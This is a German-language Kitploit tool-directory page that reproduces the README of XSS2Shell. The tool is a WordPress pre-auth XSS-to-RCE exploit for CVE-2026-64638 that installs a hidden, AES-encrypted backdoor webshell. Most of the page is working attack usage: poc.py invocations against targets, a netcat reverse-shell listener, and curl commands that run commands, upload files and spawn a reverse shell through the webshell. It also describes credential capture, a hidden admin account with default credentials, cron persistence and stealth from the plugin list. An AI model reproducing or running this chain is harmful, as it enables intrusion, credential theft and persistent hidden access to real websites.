Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
XSS2Shell — Nutzt eine Pre-Auth-XSS-Schwachstelle in WordPress (CVE-2026-64638) aus, um Remote-Codeausführung zu erlangen, und installiert eine AES-verschlüsselte Backdoor-Webshell mit Persistenz, Datei-Upload, Reverse-Shell und Stealth-Optionen für autorisierte Red-Team-Einsätze. | Kitploit
Tools/GitHubGitHub/g0d150ne/xss2shell
PersistenzmechanismenExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationCommand and ControlRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHubg0d150ne/xss2shell

XSS2Shell

Nutzt eine Pre-Auth-XSS-Schwachstelle in WordPress (CVE-2026-64638) aus, um Remote-Codeausführung zu erlangen, und installiert eine AES-verschlüsselte Backdoor-Webshell mit Persistenz, Datei-Upload, Reverse-Shell und Stealth-Optionen für autorisierte Red-Team-Einsätze.

6vor 29 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
Teilen

XSS2Shell ULTIMATE v3.0

WordPress Pre-Auth-XSS → RCE-Exploit-Kette
Entwickelt von G0D150NE

📌 Funktionen

  • 🔍 Automatische Erkennung von XSS & WordPress-Version
  • 🎯 3 Modi: Auto, XSS, Direkt
  • 📡 Callback-Server zum Erfassen von Anmeldedaten
  • 🐚 WebShell mit mehreren Ausführungsmethoden
  • 🔄 Persistenz (Cron-Job, versteckter Admin, Selbstreplikation)
  • 📁 Datei-Upload/-Download
  • 🖥️ Reverse Shell mit einem Klick
  • 🛡️ Stealth-Modus (in der Plugin-Liste unsichtbar)
  • 🔐 AES-256-verschlüsselte Backdoor

📦 Installation

root@kitploit:~
# Clone
git clone https://github.com/g0d150ne/XSS2Shell.git
cd XSS2Shell

# Install dependencies
pip3 install requests beautifulsoup4 cryptography

# Run
python3 poc.py -h

🚀 Schnellstart

1. Listener einrichten

root@kitploit:~
# Open terminal for reverse shell
nc -lvnp 4444

2. Exploit ausführen

Auto-Modus (empfohlen)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --lhost 192.168.1.100

XSS-Modus (ohne Anmeldedaten)

root@kitploit:~
python3 poc.py http://target.com --mode xss --lhost 192.168.1.100

Direkt-Modus (mit Anmeldedaten)

root@kitploit:~
python3 poc.py http://target.com -u admin -p pass123 --mode direct --lhost 192.168.1.100

🔧 Befehlsausführung

Nach Installation der WebShell:

root@kitploit:~
# Base64 encoded (recommended)
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?b2h='$(echo -n 'id' | base64)

# Plain command
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?cmd=whoami'

# Upload file
curl -F '[email protected]' http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php

# Reverse shell
curl 'http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php?rev=1'

🎯 Anwendungsbeispiele

root@kitploit:~
# 1. Auto scan + exploit
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5

# 2. XSS chain without credentials
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5

# 3. Custom port & plugin name
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --lport 1337 --slug backdoor

# 4. Change backdoor password
python3 poc.py http://wordpress-site.com -u admin -p pass123 --lhost 10.0.0.5 --backdoor-pass MySecretPass

# 5. Custom callback port
python3 poc.py http://wordpress-site.com --mode xss --lhost 10.0.0.5 --callback-port 9999

📝 Befehlsoptionen

OptionBeschreibungStandard
targetZiel-WordPress-URLErforderlich
-u, --usernameWordPress-Admin-Benutzername-
-p, --wp-passWordPress-Admin-Passwort-
--lhostListener-IP-Adresse127.0.0.1
--lportListener-Port4444
--modeExploit-Modus (auto/xss/direct)auto
--slugPlugin-Slug-Nameg0d150ne
--callback-portCallback-Server-Port9090
--backdoor-passBackdoor-PasswortG0D150NE

🐚 WebShell-Funktionen

Nach erfolgreichem Exploit:

FunktionBefehl
Befehl ausführen?b2h=BASE64_CMD
Datei hochladen-F '[email protected]'
Reverse Shell?rev=1
Direkter Befehl?cmd=id
Verschlüsselte Backdoor?decrypt=AES_DATA

Versteckter Admin erstellt:

  • Benutzername: sysadmin_{slug}
  • Passwort: {backdoor-pass} (Standard: G0D150NE)

📸 Beispielausgabe

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║  Target   : http://wordpress-site.com
║  Attacker : 192.168.1.100:4444
║  Plugin   : g0d150ne
║  Mode     : AUTO
╚══════════════════════════════════════════════════════════════════╝

[•] Detecting WordPress version...
[+] WordPress version: 6.7.0
[•] Testing XSS vulnerability...
[+] XSS vulnerable! Vector: <area id=ajaxurl...
[+] Login successful as admin
[+] Plugin uploaded successfully
[+] Webshell ready: http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php
[+] Test: uid=33(www-data)

╔══════════════════════════════════════════════════════════════════╗
║  [+] EXPLOIT SUCCESSFUL                                          ║
╠══════════════════════════════════════════════════════════════════╣
║  WEBSHELL:                                                       ║
║    http://target.com/wp-content/plugins/g0d150ne/g0d150ne.php    ║
║  ADMIN USER CREATED:                                             ║
║    Username: sysadmin_g0d150ne                                   ║
║    Password: G0D150NE                                            ║
╚══════════════════════════════════════════════════════════════════╝

🔧 Fehlerbehebung

ProblemLösung
ModuleNotFoundErrorpip3 install requests beautifulsoup4 cryptography
Connection refusedListener prüfen: nc -lvnp 4444
Login failedAnmeldedaten überprüfen oder XSS-Modus verwenden
Plugin upload failedBerechtigungen prüfen, anderen Slug verwenden
Argument conflict-p für wp-pass, --backdoor-pass für die Backdoor verwenden

⚠️ Haftungsausschluss

Nur für Bildungszwecke und autorisierte Tests.
Verwenden Sie das Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben.
Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden.

📞 Kontakt

  • Autor: G0D150NE
  • CVE: CVE-2026-64638
Tool herunterladen